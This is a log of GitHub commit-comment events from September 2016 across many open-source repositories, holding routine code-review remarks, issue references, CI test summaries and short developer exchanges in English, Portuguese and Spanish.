{"id":"4610724701","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19152418,"position":null,"line":null,"path":null,"commit_id":"e8b9b7475ff04e6c29f3c1e7c2c3d85be93ab702","created_at":"2016-09-23T20:25:55Z","updated_at":"2016-09-23T20:25:55Z","body":"Also see [Issue 303: Add TestScripts directory; move test fodder into it](http://github.com/weidai11/cryptopp/issues/303)."}},"created_at":"2016-09-23T20:25:55Z"}
{"id":"4610727390","type":"CommitCommentEvent","actor":{"login":"dharvey-consbio"},"repo":{"name":"consbio/tablo"},"payload":{"comment":{"id":19152424,"position":16,"line":257,"path":"tablo/models.py","commit_id":"fb287005b07a19dbd6d4f1ad42d7b75e4fc59ff6","created_at":"2016-09-23T20:26:27Z","updated_at":"2016-09-23T20:26:27Z","body":"The extra iteration could be saved as follows:\r\n```python\r\n        order_by_field_objs = []\r\n        order_by_field_names = []\r\n        for field in (f.strip() for f in kwargs.get('order_by_fields') or ''):\r\n            m = re.match('(\\S*)\\s?(asc|desc)?', field, re.IGNORECASE)\r\n            field_obj = {'field_name': m.group(1)}\r\n            try:\r\n                field_obj['order_modifier'] = m.group(2)\r\n            except IndexError:\r\n                pass  # No modifier\r\n            order_by_field_objs.append(field_obj)\r\n            order_by_field_names.append(field_obj['field_name'])\r\n```"}},"created_at":"2016-09-23T20:26:27Z"}
{"id":"4610731966","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19152431,"position":null,"line":null,"path":null,"commit_id":"2bafebe7980444bd96070efac0b8b13b09838898","created_at":"2016-09-23T20:27:22Z","updated_at":"2016-09-23T20:27:22Z","body":"See [Issue 303: Add TestScripts directory; move test fodder into it](http://github.com/weidai11/cryptopp/issues/303). Also see [Additional test scripts and TestScript directory?](http://groups.google.com/forum/#!topic/cryptopp-users/mCT62BDZEEA) on the mailing list."}},"created_at":"2016-09-23T20:27:22Z"}
{"id":"4610733106","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19152436,"position":null,"line":null,"path":null,"commit_id":"dca76d760d697b4bfe0bc9e0ef280432953977e9","created_at":"2016-09-23T20:27:38Z","updated_at":"2016-09-23T20:27:38Z","body":"See [Issue 303: Add TestScripts directory; move test fodder into it](http://github.com/weidai11/cryptopp/issues/303). Also see [Additional test scripts and TestScript directory?](http://groups.google.com/forum/#!topic/cryptopp-users/mCT62BDZEEA) on the mailing list."}},"created_at":"2016-09-23T20:27:38Z"}
{"id":"4610733919","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19152438,"position":null,"line":null,"path":null,"commit_id":"95242416d65c78a123df6f0f4b252588be301df4","created_at":"2016-09-23T20:27:48Z","updated_at":"2016-09-23T20:27:48Z","body":"See [Issue 303: Add TestScripts directory; move test fodder into it](http://github.com/weidai11/cryptopp/issues/303). Also see [Additional test scripts and TestScript directory?](http://groups.google.com/forum/#!topic/cryptopp-users/mCT62BDZEEA) on the mailing list."}},"created_at":"2016-09-23T20:27:48Z"}
{"id":"4610734887","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19152441,"position":null,"line":null,"path":null,"commit_id":"91861fd2c6aa040aa4b94d55c9a9f3f00b3a1150","created_at":"2016-09-23T20:28:00Z","updated_at":"2016-09-23T20:28:00Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-MacOS-10.9-clang: OK (2328 of 2338 tests passed, 24 test warnings)\n\n * 34 tests had: AUD diffs.\n * 6 tests had: EIO diffs.\n * 6 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 10 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n * 15 tests had: Table small diffs.\n * 3 tests had: RDD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91861fd2c6aa040aa4b94d55c9a9f3f00b3a1150-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91861fd2c6aa040aa4b94d55c9a9f3f00b3a1150-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.57%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T20:28:00Z"}
{"id":"4610735601","type":"CommitCommentEvent","actor":{"login":"arctouch-kaiqueferreira"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19152443,"position":26,"line":26,"path":"app/src/main/java/br/com/arctouch/arctouchbus/ArctouchBus.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-23T20:28:09Z","updated_at":"2016-09-23T20:28:09Z","body":"why did you leave the field access implicit?\r\n"}},"created_at":"2016-09-23T20:28:09Z"}
{"id":"4610736256","type":"CommitCommentEvent","actor":{"login":"samir-patnaik"},"repo":{"name":"samir-patnaik/UdacityCS253"},"payload":{"comment":{"id":19152445,"position":6,"line":52,"path":"webapp/Problem-Statement-3/simpleblog/main.py","commit_id":"dcabbc4cee4592e080c0a8d5e51c4775234bed99","created_at":"2016-09-23T20:28:16Z","updated_at":"2016-09-23T20:28:16Z","body":"not passing _user_ into params stopped _user_ from being recognised in \"base.html\" "}},"created_at":"2016-09-23T20:28:16Z"}
{"id":"4610737218","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/scope-http-statistics"},"payload":{"comment":{"id":19152448,"position":25,"line":141,"path":"ebpf-programs/http-responses.c","commit_id":"9e7f069d0e920da72d44a7e0711b464684588e77","created_at":"2016-09-23T20:28:30Z","updated_at":"2016-09-23T20:28:30Z","body":"`memcpy()` is in `string.h` and for some reason, it was not found. I skipped it to focus on make the code work."}},"created_at":"2016-09-23T20:28:30Z"}
{"id":"4610737298","type":"CommitCommentEvent","actor":{"login":"andrkhar"},"repo":{"name":"andrkhar/TheFreeBird"},"payload":{"comment":{"id":19152449,"position":null,"line":null,"path":null,"commit_id":"250cb738169f115306720c63c0f1d4983b7bd333","created_at":"2016-09-23T20:28:31Z","updated_at":"2016-09-23T20:28:31Z","body":"This commit introduced a bug on start of the game. I will further simplify and refactor the code and try to solve it in the future. Use release 1.07 for stable game."}},"created_at":"2016-09-23T20:28:31Z"}
{"id":"4610740728","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19152457,"position":null,"line":null,"path":null,"commit_id":"2a22a84cd869a3f7da1d205b3d2f84ac5e19dfae","created_at":"2016-09-23T20:29:14Z","updated_at":"2016-09-23T20:29:14Z","body":"Also see [Issue 76:Add setenv scripts for Makefile based cross-compiles](https://github.com/weidai11/cryptopp/issues/76)"}},"created_at":"2016-09-23T20:29:14Z"}
{"id":"4610741094","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-http-statistics"},"payload":{"comment":{"id":19152460,"position":110,"line":110,"path":"ebpf-programs/http-responses.c","commit_id":"bc706ab377382e254ee7d4e0c2827b2603635ffb","created_at":"2016-09-23T20:29:19Z","updated_at":"2016-09-23T20:29:19Z","body":"There is no cast, this is pretty common: http://stackoverflow.com/questions/8611815/determine-if-char-is-a-num-or-letter"}},"created_at":"2016-09-23T20:29:19Z"}
{"id":"4610741475","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19152462,"position":null,"line":null,"path":null,"commit_id":"4ff49bfc6201ad433b804d2cc3436dfecaed8d36","created_at":"2016-09-23T20:29:24Z","updated_at":"2016-09-23T20:29:24Z","body":"Also see [Issue 76:Add setenv scripts for Makefile based cross-compiles](https://github.com/weidai11/cryptopp/issues/76)"}},"created_at":"2016-09-23T20:29:24Z"}
{"id":"4610741543","type":"CommitCommentEvent","actor":{"login":"arctouch-kaiqueferreira"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19152463,"position":80,"line":80,"path":"app/src/main/java/br/com/arctouch/arctouchbus/ArctouchBus.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-23T20:29:25Z","updated_at":"2016-09-23T20:29:25Z","body":"please note that all variables should be named in english"}},"created_at":"2016-09-23T20:29:25Z"}
{"id":"4610749059","type":"CommitCommentEvent","actor":{"login":"arctouch-kaiqueferreira"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19152490,"position":35,"line":35,"path":"app/src/main/java/br/com/arctouch/arctouchbus/ArctouchBus.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-23T20:30:59Z","updated_at":"2016-09-23T20:30:59Z","body":"what do you think about variable name convention?  Do you think it is a good idea to have a variable named \"a\" ?"}},"created_at":"2016-09-23T20:30:59Z"}
{"id":"4610751111","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19152496,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-23T20:31:25Z","updated_at":"2016-09-23T20:31:25Z","body":"I'll let you decide what is better API to use. They have advantages and disadvantages, and I think it'll be good for your growth to evaluate them each."}},"created_at":"2016-09-23T20:31:25Z"}
{"id":"4610755642","type":"CommitCommentEvent","actor":{"login":"rmasoni"},"repo":{"name":"lessandra/sketch-archive"},"payload":{"comment":{"id":19152509,"position":14,"line":11,"path":"home sketchbook.html","commit_id":"e3925ccbb9294c9dbc2a60e394784b14ffb9e3fd","created_at":"2016-09-23T20:32:20Z","updated_at":"2016-09-23T20:32:20Z","body":"É uma boa prática sempre colocar aspas nos valores dos atributos.\r\n\r\n`id=\"background\"`"}},"created_at":"2016-09-23T20:32:20Z"}
{"id":"4610755714","type":"CommitCommentEvent","actor":{"login":"arctouch-kaiqueferreira"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19152510,"position":75,"line":75,"path":"app/src/main/java/br/com/arctouch/arctouchbus/ArctouchBus.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-23T20:32:21Z","updated_at":"2016-09-23T20:32:21Z","body":"about name convention one more time, what do you think of method names starting with an uppercase character?"}},"created_at":"2016-09-23T20:32:21Z"}
{"id":"4610756173","type":"CommitCommentEvent","actor":{"login":"DSuds"},"repo":{"name":"afragen/github-updater"},"payload":{"comment":{"id":19152514,"position":null,"line":null,"path":null,"commit_id":"1b422c1f4f5309ec83183a8ea90f80ab9d1dad85","created_at":"2016-09-23T20:32:26Z","updated_at":"2016-09-23T20:32:26Z","body":"Thanks for the amazing plugin!\n\nComplaining in a vaguely helpful way is the least I can do. :)\n\n\nOn 9/23/2016 4:08 PM, Andy Fragen wrote:\n>\n> The error was really in the |class PAnD| or rather in the file. I\n> wrote in an early exit during heartbeat and this was causing the issues.\n>\n> The above code does mitigate this but not in the best way. At least\n> now I know why it was occurring. Thanks for the bug report.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/afragen/github-updater/commit/1b422c1f4f5309ec83183a8ea90f80ab9d1dad85#commitcomment-19152169>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AD9toNVsF4D7WxkdebmPXFKUY6IWbn2Yks5qtDHVgaJpZM4KFVEc>.\n>\n\n"}},"created_at":"2016-09-23T20:32:26Z"}
{"id":"4610758618","type":"CommitCommentEvent","actor":{"login":"remotevase"},"repo":{"name":"Inactive-to-Reactive/ImagicalMine"},"payload":{"comment":{"id":19152520,"position":null,"line":null,"path":null,"commit_id":"990b35518bcd2ad6fef0deb7cab6b81b756147c2","created_at":"2016-09-23T20:32:59Z","updated_at":"2016-09-23T20:32:59Z","body":"Unfortunately, no. He didnt fix a single error..."}},"created_at":"2016-09-23T20:32:59Z"}
{"id":"4610761259","type":"CommitCommentEvent","actor":{"login":"rmasoni"},"repo":{"name":"lessandra/sketch-archive"},"payload":{"comment":{"id":19152527,"position":17,"line":14,"path":"home sketchbook.html","commit_id":"e3925ccbb9294c9dbc2a60e394784b14ffb9e3fd","created_at":"2016-09-23T20:33:33Z","updated_at":"2016-09-23T20:33:33Z","body":"Outra boa prática, e que também evita problemas, é eliminar o que chamamos de _trailing spaces_. Tirar todo espaço sobrando dentro ou fora das tags, a não ser, claro, que ele seja necessário pro texto."}},"created_at":"2016-09-23T20:33:33Z"}
{"id":"4610762260","type":"CommitCommentEvent","actor":{"login":"arctouch-kaiqueferreira"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19152530,"position":85,"line":85,"path":"app/src/main/java/br/com/arctouch/arctouchbus/ArctouchBus.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-23T20:33:45Z","updated_at":"2016-09-23T20:33:45Z","body":"do you think it is a good idea do move those string constants to a separate file?"}},"created_at":"2016-09-23T20:33:45Z"}
{"id":"4610764370","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19152542,"position":null,"line":null,"path":null,"commit_id":"b0689499ba619e897573376e1b32648c7636aeca","created_at":"2016-09-23T20:34:13Z","updated_at":"2016-09-23T20:34:13Z","body":"@Mysterium cooler is doing sai scripts, alexkulya as far as I saw zones, I'm doing bosses/creature scripts and you choose something at what you are best."}},"created_at":"2016-09-23T20:34:13Z"}
{"id":"4610766588","type":"CommitCommentEvent","actor":{"login":"scachemaille"},"repo":{"name":"scachemaille/grive-notifier"},"payload":{"comment":{"id":19152553,"position":null,"line":null,"path":null,"commit_id":"e25e4f7254ef21d9e84a076cf417fd7b038256b0","created_at":"2016-09-23T20:34:42Z","updated_at":"2016-09-23T20:34:42Z","body":"fix #1 "}},"created_at":"2016-09-23T20:34:42Z"}
{"id":"4610766601","type":"CommitCommentEvent","actor":{"login":"im85288"},"repo":{"name":"im85288/script.tvguide.dvr"},"payload":{"comment":{"id":19152554,"position":null,"line":null,"path":null,"commit_id":"59b54f1bcfc9f28bf71d30f30745a5aa0c65c682","created_at":"2016-09-23T20:34:42Z","updated_at":"2016-09-23T20:34:42Z","body":"Yeah I got you buddy, I'm honestly not using it but will keep it in mind if I do. As a fellow Dev I know how it feels when people take without giving any credit. Keep up the good work too :)"}},"created_at":"2016-09-23T20:34:42Z"}
{"id":"4610771369","type":"CommitCommentEvent","actor":{"login":"rmasoni"},"repo":{"name":"lessandra/sketch-archive"},"payload":{"comment":{"id":19152563,"position":null,"line":null,"path":null,"commit_id":"e3925ccbb9294c9dbc2a60e394784b14ffb9e3fd","created_at":"2016-09-23T20:35:42Z","updated_at":"2016-09-23T20:35:42Z","body":"Na linha 39, a indentação do `h2` tá com um espaço a menos.\r\n\r\nO `</body>` também tá indentado diferente do `<body>`."}},"created_at":"2016-09-23T20:35:42Z"}
{"id":"4610775487","type":"CommitCommentEvent","actor":{"login":"JamesNK"},"repo":{"name":"JamesNK/Newtonsoft.Json"},"payload":{"comment":{"id":19152574,"position":null,"line":null,"path":null,"commit_id":"ca27a0fc3a4e157d4a584549e2aaa65cfc822f3b","created_at":"2016-09-23T20:36:33Z","updated_at":"2016-09-23T20:36:33Z","body":"I have no idea right now. I'm not that organized"}},"created_at":"2016-09-23T20:36:33Z"}
{"id":"4610776318","type":"CommitCommentEvent","actor":{"login":"rmasoni"},"repo":{"name":"lessandra/sketch-archive"},"payload":{"comment":{"id":19152576,"position":null,"line":null,"path":null,"commit_id":"e3925ccbb9294c9dbc2a60e394784b14ffb9e3fd","created_at":"2016-09-23T20:36:43Z","updated_at":"2016-09-23T20:36:43Z","body":"Outra coisa importante é que o nome do arquivo não tenha espaços. Eu costumo usar `-`, então ficaria `home-sketchbook.html`. Se for a página inicial, chame de `index.html`."}},"created_at":"2016-09-23T20:36:43Z"}
{"id":"4610782164","type":"CommitCommentEvent","actor":{"login":"jeff1evesque"},"repo":{"name":"jeff1evesque/genebean-winbind"},"payload":{"comment":{"id":19152590,"position":5,"line":16,"path":"lib/facter/test_join.rb","commit_id":"cf93ae49ce4b7d42e94e23fdc34699a148847907","created_at":"2016-09-23T20:37:58Z","updated_at":"2016-09-23T20:37:58Z","body":"`NET USE` always returns `0`, and has some output text:\r\n\r\n```bash\r\nC:\\Windows\\System32>NET USE\r\nNew connections will be remembered.\r\n\r\nThere are no entries in the list.\r\n\r\n\r\nC:\\Windows\\System32>\r\n```\r\n\r\nWhat I may do is implement `NET USE  | '{ awk if (contains substring) {exit(1)}; else { exit(0) }; }'`, where substring may be `There are no entries in the list.`.  I would try to implement this within `Facter::Core::Execution.exec()`."}},"created_at":"2016-09-23T20:37:58Z"}
{"id":"4610782639","type":"CommitCommentEvent","actor":{"login":"arctouch-kaiqueferreira"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19152591,"position":114,"line":114,"path":"app/src/main/java/br/com/arctouch/arctouchbus/RouteDetails.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-23T20:38:05Z","updated_at":"2016-09-23T20:38:05Z","body":"do you know any other of mapping the json to an object instead of building a string separated by \\n"}},"created_at":"2016-09-23T20:38:05Z"}
{"id":"4610782813","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-http-statistics"},"payload":{"comment":{"id":19152592,"position":110,"line":110,"path":"ebpf-programs/http-responses.c","commit_id":"bc706ab377382e254ee7d4e0c2827b2603635ffb","created_at":"2016-09-23T20:38:07Z","updated_at":"2016-09-23T20:38:07Z","body":"This pattern like `(ch >= '0') && (ch <= '9')` is used in a lot of places in the kernel, for example\r\nhttps://github.com/torvalds/linux/blob/master/arch/x86/boot/ctype.h#L6"}},"created_at":"2016-09-23T20:38:07Z"}
{"id":"4610784683","type":"CommitCommentEvent","actor":{"login":"plexoos"},"repo":{"name":"rnc-lbl/star-picoDst"},"payload":{"comment":{"id":19152596,"position":19,"line":66,"path":"StPicoDstMaker/StPicoDstMaker.cxx","commit_id":"21871d25082648d3de1350325fb65b9aa7c920ae","created_at":"2016-09-23T20:38:30Z","updated_at":"2016-09-23T20:38:30Z","body":"I overlooked this change from Victor. Let's undo the merge of the cvs branch onto master?\r\n"}},"created_at":"2016-09-23T20:38:30Z"}
{"id":"4610787141","type":"CommitCommentEvent","actor":{"login":"arctouch-kaiqueferreira"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19152604,"position":16,"line":16,"path":"app/src/main/java/br/com/arctouch/arctouchbus/RoutesAdapterList.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-23T20:39:03Z","updated_at":"2016-09-23T20:39:03Z","body":"is there any particular reason you chose to use an array instead of a List?"}},"created_at":"2016-09-23T20:39:03Z"}
{"id":"4610787305","type":"CommitCommentEvent","actor":{"login":"rmasoni"},"repo":{"name":"lessandra/sketch-archive"},"payload":{"comment":{"id":19152605,"position":null,"line":null,"path":null,"commit_id":"5f839e55a202e6ec8ebbb11fe4dadb1e803416e9","created_at":"2016-09-23T20:39:05Z","updated_at":"2016-09-23T20:39:05Z","body":"O Git não lida muito bem com arquivos grandes binários, como `.psd`, então sugiro que faça o controle de versão dele num repositório à parte ou em outro serviço, tipo Dropbox."}},"created_at":"2016-09-23T20:39:05Z"}
{"id":"4610792132","type":"CommitCommentEvent","actor":{"login":"arctouch-kaiqueferreira"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19152613,"position":17,"line":17,"path":"app/src/main/java/br/com/arctouch/arctouchbus/RoutesAdapterList.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-23T20:40:07Z","updated_at":"2016-09-23T20:40:07Z","body":"the imagesId is not being used, what is your opinion on leaving unused code?"}},"created_at":"2016-09-23T20:40:07Z"}
{"id":"4610794984","type":"CommitCommentEvent","actor":{"login":"n054"},"repo":{"name":"n054/crystal"},"payload":{"comment":{"id":19152618,"position":null,"line":null,"path":null,"commit_id":"50cee13372dfa28013a5e1d843de86ba88287b68","created_at":"2016-09-23T20:40:43Z","updated_at":"2016-09-23T20:40:43Z","body":"$ git push origin"}},"created_at":"2016-09-23T20:40:43Z"}
{"id":"4610795451","type":"CommitCommentEvent","actor":{"login":"oli-obk"},"repo":{"name":"oli-obk/miri"},"payload":{"comment":{"id":19152619,"position":105,"line":653,"path":"src/interpreter/mod.rs","commit_id":"2282289ad5fbfaaaffd6b4fe4ceb6665ab9ab391","created_at":"2016-09-23T20:40:48Z","updated_at":"2016-09-23T20:40:48Z","body":"That won't work. They have different meta data"}},"created_at":"2016-09-23T20:40:48Z"}
{"id":"4610802226","type":"CommitCommentEvent","actor":{"login":"arctouch-kaiqueferreira"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19152639,"position":21,"line":21,"path":"app/src/main/java/br/com/arctouch/rest/HttpRequestClient.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-23T20:42:15Z","updated_at":"2016-09-23T20:42:15Z","body":"do you think it is a good idea to move these constants somewhere else?"}},"created_at":"2016-09-23T20:42:15Z"}
{"id":"4610803454","type":"CommitCommentEvent","actor":{"login":"jedipi"},"repo":{"name":"mvantellingen/python-zeep"},"payload":{"comment":{"id":19152644,"position":null,"line":null,"path":null,"commit_id":"d44f3fc73f6f2a9b567be3ece077d018cc49cfa6","created_at":"2016-09-23T20:42:30Z","updated_at":"2016-09-23T20:42:30Z","body":"nvm.. I was looking at the wrong issue number. I meant https://github.com/mvantellingen/python-zeep/issues/186"}},"created_at":"2016-09-23T20:42:30Z"}
{"id":"4610808097","type":"CommitCommentEvent","actor":{"login":"arctouch-kaiqueferreira"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19152658,"position":15,"line":15,"path":"app/src/main/res/layout/activity_details.xml","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-23T20:43:26Z","updated_at":"2016-09-23T20:43:26Z","body":"do you think scrollView2 is a meaningful name?"}},"created_at":"2016-09-23T20:43:26Z"}
{"id":"4610809501","type":"CommitCommentEvent","actor":{"login":"noplay"},"repo":{"name":"GNS3/gns3-server"},"payload":{"comment":{"id":19152663,"position":6,"line":201,"path":"gns3server/compute/builtin/nodes/cloud.py","commit_id":"2ca8bce6e3194af64d383485b73b6f04b339c39d","created_at":"2016-09-23T20:43:44Z","updated_at":"2016-09-23T20:43:44Z","body":"It's a mistake no need for this line of change\n\nLe ven. 23 sept. 2016 21:44, Jeremy Grossmann <notifications@github.com> a\nécrit :\n\n> This will require lib pcap to be installed.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/GNS3/gns3-server/commit/2ca8bce6e3194af64d383485b73b6f04b339c39d#commitcomment-19151819>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAVFXWeLg8ujjuvNmdLofpyRQaiJeYZSks5qtCwhgaJpZM4KFU7->\n> .\n>\n"}},"created_at":"2016-09-23T20:43:44Z"}
{"id":"4610812840","type":"CommitCommentEvent","actor":{"login":"JoseJuan81"},"repo":{"name":"JoseJuan81/Programa-Drywall-en-excel"},"payload":{"comment":{"id":19152679,"position":null,"line":null,"path":null,"commit_id":"4720e7c28930d7781aa05bd6af37191bcc003a06","created_at":"2016-09-23T20:44:26Z","updated_at":"2016-09-23T20:44:26Z","body":"Este Archivo tiene el módulo1 en VB funcionando correctamente. Los datos de aprecian de forma satisfactoria."}},"created_at":"2016-09-23T20:44:26Z"}
{"id":"4610814800","type":"CommitCommentEvent","actor":{"login":"ivs5069"},"repo":{"name":"ivs5069/WheelOfFortune"},"payload":{"comment":{"id":19152685,"position":null,"line":null,"path":null,"commit_id":"c0ba6d9914e44d85fbf0a5125ab2bf4410f10d79","created_at":"2016-09-23T20:44:51Z","updated_at":"2016-09-23T20:44:51Z","body":"This commit also includes spinning the board and guessing a letter"}},"created_at":"2016-09-23T20:44:51Z"}
{"id":"4610816509","type":"CommitCommentEvent","actor":{"login":"mmalohlava"},"repo":{"name":"h2oai/sparkling-water"},"payload":{"comment":{"id":19152689,"position":null,"line":null,"path":null,"commit_id":"cd3673c5b15a9e9f487d56044c30437acb9f5f51","created_at":"2016-09-23T20:45:14Z","updated_at":"2016-09-23T20:45:14Z","body":"We are working in parallel, however, we should synchronized on overlapping pieces. \r\nPlease comment on the PR or let's do a group call with @jakubhava to clarify overall intentions.\r\nFYI: @jakubhava will be in the office in 2weeks\r\n\r\nIt was partly reason why I asked the question^^ - since integrating big changes is always pain. Splitting them into smaller PRs can be at the end beneficial for all. Also improve testability.\r\n\r\nSorry, for holding the PR.\r\n"}},"created_at":"2016-09-23T20:45:14Z"}
{"id":"4610818662","type":"CommitCommentEvent","actor":{"login":"shurcooL"},"repo":{"name":"gogo/protobuf"},"payload":{"comment":{"id":19152700,"position":null,"line":null,"path":null,"commit_id":"08dc052e9af8ac508edec335d01020a54d0989a9","created_at":"2016-09-23T20:45:40Z","updated_at":"2016-09-23T20:45:40Z","body":"If you don't mind me asking, how can you fix something you can't reproduce?"}},"created_at":"2016-09-23T20:45:40Z"}
{"id":"4610826625","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"tbalden/htc-kernel-pmewlvzw"},"payload":{"comment":{"id":19152725,"position":null,"line":null,"path":null,"commit_id":"f102336058a61fbaadc9f8d6a32256b4ffdca27c","created_at":"2016-09-23T20:47:21Z","updated_at":"2016-09-23T20:47:21Z","body":"This is a great idea!"}},"created_at":"2016-09-23T20:47:21Z"}
{"id":"4610827103","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19152728,"position":null,"line":null,"path":null,"commit_id":"0eb8b92064db014100d6ed2b618c8cf635b37c26","created_at":"2016-09-23T20:47:28Z","updated_at":"2016-09-23T20:47:28Z","body":"Congrats, and good luck too :)"}},"created_at":"2016-09-23T20:47:28Z"}
{"id":"4610842757","type":"CommitCommentEvent","actor":{"login":"JoseJuan81"},"repo":{"name":"JoseJuan81/Programa-Drywall-en-excel"},"payload":{"comment":{"id":19152770,"position":null,"line":null,"path":null,"commit_id":"850969f5302e53575f32d65b4b091698f7bdcb8d","created_at":"2016-09-23T20:50:47Z","updated_at":"2016-09-23T20:50:47Z","body":"Archivo base que perdió el formato debido a que lo abrí y guarde en Libre Office y excel se puso exquisito."}},"created_at":"2016-09-23T20:50:47Z"}
{"id":"4610848180","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19152788,"position":null,"line":null,"path":null,"commit_id":"e571fd0e8ee7d755a88fa15c3269202baebbe209","created_at":"2016-09-23T20:51:55Z","updated_at":"2016-09-23T20:51:55Z","body":"Hmm, so you mean I should simplify RookOnPawn if I want to keep the outpost bonus for rooks ?"}},"created_at":"2016-09-23T20:51:55Z"}
{"id":"4610849207","type":"CommitCommentEvent","actor":{"login":"devernay"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19152794,"position":null,"line":null,"path":null,"commit_id":"211bb957b88697b32b95b23f72f1a1db53fafdb0","created_at":"2016-09-23T20:52:10Z","updated_at":"2016-09-23T20:52:10Z","body":"Pik Is a Keyer! the goal is to obtain something that approaches IBK in Nuke or KAK in Fusion"}},"created_at":"2016-09-23T20:52:10Z"}
{"id":"4610850638","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19152802,"position":null,"line":null,"path":null,"commit_id":"ed25a6b0d983a98155087e53dab7e871e25252d6","created_at":"2016-09-23T20:52:28Z","updated_at":"2016-09-23T20:52:28Z","body":"Rage values are total disaster and until I figure out what value I put in core is exactly 1 rage in game I will put this boss on hold and remove his script from here, and move on to Malkorok."}},"created_at":"2016-09-23T20:52:28Z"}
{"id":"4610855523","type":"CommitCommentEvent","actor":{"login":"BadChoice"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19152822,"position":null,"line":null,"path":null,"commit_id":"8c1546831629da0444b02257190e6921e78cefac","created_at":"2016-09-23T20:53:26Z","updated_at":"2016-09-23T20:53:26Z","body":"I like having the readme there so I can quickly edit it, but yeah.. it creates that annoying warning... so better this out"}},"created_at":"2016-09-23T20:53:26Z"}
{"id":"4610860518","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/scope-http-statistics"},"payload":{"comment":{"id":19152837,"position":25,"line":141,"path":"ebpf-programs/http-responses.c","commit_id":"9e7f069d0e920da72d44a7e0711b464684588e77","created_at":"2016-09-23T20:54:27Z","updated_at":"2016-09-23T20:54:27Z","body":"> new_codes_counts = current_codes_counts;\r\n\r\nThis does not work because `new_codes_counts = current_codes_counts;` `current_codes_counts` is a pointer and `new_codes_counts` an instance of the struct, but even if I make it a point it would not work because the weird thing about coping into the stack when reading from a map (you need to copy the whole data not only the pointer)."}},"created_at":"2016-09-23T20:54:27Z"}
